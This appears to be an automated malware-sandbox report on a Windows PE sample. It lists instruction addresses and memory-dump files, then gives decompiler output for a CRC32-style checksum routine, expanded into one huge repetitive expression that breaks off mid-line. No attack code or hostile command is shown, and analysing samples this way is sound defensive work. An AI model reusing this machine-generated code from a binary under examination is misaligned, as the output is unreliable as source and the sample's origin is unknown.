0x00404d5b
0x00404d5f
0x00404d65
0x00404d68
0x00404d6b
0x00404d6e
0x00404d73
0x00404d79
0x00404d7f
0x00404d82
0x00404d85
0x00404f85
0x00404f88
0x00404c7e
0x00000000
0x00404f98
0x00404f98
0x00000000
0x00404f98
0x00404f88
0x00404d95
0x00404d98
0x00404d9b
0x00404d9e
0x00404da5
0x00404da8
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dae
0x00404dae
0x00404db1
0x00404db6
0x00404e9a
0x00404ea2
0x00404ea8
0x00404eab
0x00404eb0
0x00404eb8
0x00404ebd
0x00404ed9
0x00404ee2
0x00404ee8
0x00404ebf
0x00404ec4
0x00404ec6
0x00404ece
0x00404ece
0x00404eeb
0x00404eef
0x00404ef9
0x00404efa
0x00404efe
0x00404f03
0x00404f23
0x00404f28
0x00404f29
0x00404f2b
0x00404f2e
0x00404f32
0x00404f34
0x00404f34
0x00404f3d
0x00404f40
0x00404f47
0x00404f4b
0x00404f54
0x00000000
0x00000000
0x00404f56
0x00404f59
0x00404f5c
0x00404f5c
0x00000000
0x00404f47
0x00404f08
0x00404f0b
0x00404f0e
0x00404f10
0x00404f17
0x00404f1a
0x00404f1c
0x00404f21
0x00000000
0x00404f21
0x00404eb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dbc
0x00404dbc
0x00404dbc
0x00404dbf
0x00404dc4
0x00404dc6
0x00404dcc
0x00404dd0
0x00404dd3
0x00404dd5
0x00404dd5
0x00404de0
0x00404de2
0x00404de3
0x00404de5
0x00404de8
0x00404e17
0x00404e1c
0x00404e1d
0x00404e1f
0x00404e21
0x00404e24
0x00404e2d
0x00000000
0x00000000
0x00404dea
0x00404dea
0x00404df3
0x00404df8
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dfa
0x00404dfa
0x00404dfa
0x00404dfe
0x00000000
0x00000000
0x00404e00
0x00404e03
0x00404e06
0x00404e0a
0x00000000
0x00000000
0x00404e0c
0x00404e0c
0x00000000
0x00404dfa
0x00404e32
0x00404e38
0x00404e3b
0x00404e42
0x00404e47
0x00404e49
0x00404e4e
0x00404e8a
0x00404e50
0x00404e50
0x00404e56
0x00404e5d
0x00404e60
0x00404e65
0x00404e6c
0x00404e6e
0x00404e79
0x00404e7b
0x00404e7e
0x00404e7e
0x00404e8c
0x00404e8f
0x00404e98
0x00000000
0x00404f61
0x00404f64
0x00404f67
0x00404f6f
0x00404f6f
0x00404f72
0x00404f79
0x00404f7c
0x00000000
0x00404d9b
0x00404d11
0x00404d13
0x00404d13
0x00404d17
0x00404d1a
0x00404d1b
0x00404d1b
0x00000000
0x00404cd4
0x00404cd4
0x00404cd8
0x00404cd8
0x00404cda
0x00000000
0x00000000
0x00404ce0
0x00404ce1
0x00404ce4
0x00404ce8
0x00000000
0x00000000
0x00000000
0x00404ce8
0x00404e10
0x00404e10
0x00404f9a
0x00404f9a
0x00000000
0x00404f9a
0x00404cd2
0x00404c77
0x00404c7c
0x00000000

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
Instruction ID: 9637f4fcf05056c634a246d4ec164b1eccd92df816b65a9601eba7856632ad8a
Opcode Fuzzy Hash: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
Instruction Fuzzy Hash: 36D1F5B1A002199FDF14CFA9D9805EDBBB1FF88314F25826AD959B7390D734AA41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040541F Relevance: .1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040541F(signed int _a4, signed char* _a8, unsigned int _a12) {
				signed int _t35;
				signed char* _t73;
				signed char* _t74;
				signed char* _t75;
				signed char* _t76;
				signed char* _t77;
				signed char* _t78;
				signed char* _t79;
				unsigned int _t85;

				_t73 = _a8;
				if(_t73 != 0) {
					_t35 =  !_a4;
					if(_a12 >= 8) {
						_t85 = _a12 >> 3;
						do {
							_a12 = _a12 - 8;
							_t74 =  &(_t73[1]);
							_t75 =  &(_t74[1]);
							_t76 =  &(_t75[1]);
							_t77 =  &(_t76[1]);
							_t78 =  &(_t77[1]);
							_t79 =  &(_t78[1]);
							_t35 = ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 